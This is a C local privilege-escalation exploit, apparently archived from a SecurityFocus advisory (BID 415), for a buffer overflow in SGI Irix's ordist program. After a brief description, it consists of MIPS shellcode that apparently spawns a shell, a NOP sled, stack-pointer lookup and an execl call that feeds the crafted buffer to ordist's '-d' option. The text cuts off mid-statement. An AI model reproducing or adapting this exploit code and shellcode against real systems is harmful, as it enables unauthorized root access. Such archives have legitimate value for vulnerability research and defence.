// source: https://www.securityfocus.com/bid/415/info A buffer overflow exists in the ordist program, as shipped with Irix 6.x and 5.x from Silicon Graphics. By supplying long arguments to the '-d' option, containing a properly crafted buffer of machine exectuable code, root privilege can be obtained. #include #include #define BUFSIZE 306 #define OFFS 800 #define ADDRS 2 #define ALIGN 2 void run(unsigned char *buf) { execl("/usr/bsd/ordist", "ordist", "-d", buf, "-d", buf, NULL); printf("execl failed\n"); } char asmcode[]="\x3c\x18\x2f\x62\x37\x18\x69\x6e\x3c\x19\x2f\x73\x37\x39\x68\x2e\xaf\xb8\xff\xf8\xaf\xb9\xff\xfc\xa3\xa0\xff\xff\x27\xa4\xff\xf8\x27\xa5\xff\xf0\x01\x60\x30\x24\xaf\xa4\xff\xf0\xaf\xa0\xff\xf4\x24\x02\x04\x23\x02\x04\x8d\x0c"; char nop[]="\x24\x0f\x12\x34"; unsigned long get_sp(void) { __asm__("or $2,$sp,$0"); } /* this align stuff sux - i do know. */ main(int argc, char *argv[]) { char *buf, *ptr, addr[8]; int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS, align=ALIGN; int i, noplen=strlen(nop); if (argc >1) bufsize=atoi(argv[1]); if (argc >2) offs=atoi(argv[2]); if (argc >3) addrs=atoi(argv[3]); if (argc >4) align=atoi(argv[4]); if (bufsize